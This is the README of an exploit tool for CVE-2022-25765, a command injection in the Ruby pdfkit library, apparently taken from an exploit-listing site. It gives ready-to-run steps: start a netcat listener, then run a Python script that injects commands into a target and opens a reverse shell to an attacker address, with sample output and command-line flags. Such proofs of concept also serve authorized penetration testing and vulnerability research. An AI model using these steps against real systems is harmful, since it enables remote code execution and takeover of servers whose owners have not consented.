## https://sploitus.com/exploit?id=38A6D118-ABAB-59DD-9EA2-5FD83636A6BE
# PDFkit-CMD-Injection (CVE-2022-25765)
Exploit for **CVE-2022-25765** command injection in pdfkit < 0.8.6

More details about the vulnerability are in the [Snyk advisory](https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795).

## PoC

Start a netcat listener on your host:
```
$ nc -lvnp 1337
```

Run the exploit (example):
```
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
```

Flags:
```
-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default
```